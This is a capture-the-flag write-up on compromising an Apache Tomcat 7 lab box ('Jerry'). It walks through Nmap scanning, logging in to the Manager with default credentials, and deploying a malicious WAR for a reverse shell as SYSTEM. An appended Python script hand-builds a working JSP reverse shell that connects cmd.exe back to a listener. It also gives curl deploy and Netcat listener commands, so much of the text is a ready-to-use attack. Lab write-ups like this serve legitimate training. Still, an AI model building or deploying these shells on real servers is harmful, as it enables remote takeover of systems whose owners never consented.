Jerry Writeup
Without Metasploit
Reconnaissance
Initial Nmap scan to find open ports, treating all hosts as online (-Pn) so the scan is not skipped if the target drops ICMP echo requests.
Detailed Nmap scan against the port the first scan found open:
Command breakdown:
(-sV): Probe the open port for service and version information
(-sC): Run Nmap's default script set against it
(-p 8080): Scan only port 8080
(-oN nmap): Save the output in normal format to a file called nmap
Let's visit the web server this machine hosts on port 8080.
Looking at the site and poking around tells us that Apache Tomcat/7.0.88 is running, and that we need a set of credentials to log in to the Manager application before we can do anything useful.
What we can do now is search for Tomcat's default credentials (pairs such as tomcat:tomcat, admin:admin or tomcat:s3cret are common) and try them against the Manager login. There is also a shortcut: the 401 error page Tomcat returns when we submit wrong credentials to the Manager app includes an example tomcat-users.xml entry, complete with a username and a password, which is worth trying as-is.
Let's try logging in with these credentials.
And we are logged in! Looking at the Manager application we can see an option to deploy WAR files. Tomcat unpacks a deployed WAR and runs any JSP it contains server-side, so we can generate a WAR carrying a reverse-shell payload with msfvenom and get a shell on the server.
Exploitation
First we generate the msfvenom WAR file, calling it reverse.war. I'm using my machine's IP for LHOST (the listening host), so make sure to substitute your own IP, and note the LPORT you pick because the listener has to match it.
Now let's upload the file.
After clicking Deploy we can see that it has been added as a path (/reverse) under the Applications tab.
Browsing to the link (/reverse) executes the JSP and triggers the reverse shell, so before clicking it we start a Netcat listener on our machine on the port we chose for LPORT.
Once we click the link, the listener catches the reverse shell, and we are already NT AUTHORITY\SYSTEM because the Tomcat service on this box runs under that account; no privilege escalation is needed.
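As an added example that is not part of the original writeup, the script below builds the same kind of WAR by hand: a JSP reverse shell wrapped in a zip together with a WEB-INF/web.xml. It shows what msfvenom's WAR payload actually contains and keeps the box "without Metasploit" end to end. The JSP is the classic cmd.exe-over-socket shell; LHOST, LPORT and the file name index.jsp are assumptions you set for your own listener, and the deployment step still goes through the Manager exactly as the writeup does.

```python
#!/usr/bin/env python3
"""Hand-build a WAR carrying a JSP reverse shell (no Metasploit needed).

Added example for this writeup, not code from the original page or from
Tomcat/Metasploit. LHOST/LPORT are placeholders for your own listener.
"""
import io
import sys
import zipfile

# Classic JSP reverse shell: spawn cmd.exe and pump its stdin/stdout over a
# TCP socket to the listener. Tomcat compiles and runs it when the page is
# requested, so merely browsing to /<context>/ triggers the callback.
JSP_TEMPLATE = r"""<%@ page import="java.io.*,java.net.*" %>
<%
    String host = "__LHOST__";
    int port = __LPORT__;
    try {
        Process p = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
        Socket s = new Socket(host, port);
        InputStream pi = p.getInputStream();
        InputStream si = s.getInputStream();
        OutputStream po = p.getOutputStream();
        OutputStream so = s.getOutputStream();
        while (!s.isClosed()) {
            while (pi.available() > 0) so.write(pi.read());
            while (si.available() > 0) po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try { p.exitValue(); break; } catch (IllegalThreadStateException e) { }
        }
        p.destroy();
        s.close();
    } catch (Exception e) { }
%>
"""

# Minimal deployment descriptor: make the JSP the welcome file so that
# requesting the bare context path (/reverse) runs it.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <welcome-file-list>
    <welcome-file>__JSP__</welcome-file>
  </welcome-file-list>
</web-app>
"""


def render_jsp(lhost: str, lport: int) -> str:
    """Fill the listener address into the JSP template (placeholders, not real targets)."""
    if not 0 < lport < 65536:
        raise ValueError(f"invalid LPORT {lport}")
    return JSP_TEMPLATE.replace("__LHOST__", lhost).replace("__LPORT__", str(lport))


def build_war(lhost: str, lport: int, jsp_name: str = "index.jsp") -> bytes:
    """Return the WAR (a plain zip archive) as bytes, ready to deploy via the Manager."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.replace("__JSP__", jsp_name))
        war.writestr(jsp_name, render_jsp(lhost, lport))
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    """List archive members after checking the zip is intact, as Tomcat's deployer will."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        if war.testzip() is not None:
            raise ValueError("corrupt WAR")
        return sorted(war.namelist())


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} LHOST LPORT")
    lhost, lport = sys.argv[1], int(sys.argv[2])
    with open("reverse.war", "wb") as f:
        f.write(build_war(lhost, lport))
    print("wrote reverse.war; start the listener first:  nc -lvnp", lport)
```

Deploy the result through the Manager's "WAR file to deploy" form as in the writeup, or with the Manager text API: `curl -u 'USER:PASS' -T reverse.war 'http://TARGET:8080/manager/text/deploy?path=/reverse'` (the text API needs the manager-script role; manager-gui alone only covers the HTML form, so on a box that only grants manager-gui the form is the way in). Start `nc -lvnp LPORT` before browsing to /reverse/. The target here is Windows, hence cmd.exe; on a Linux Tomcat swap in /bin/sh.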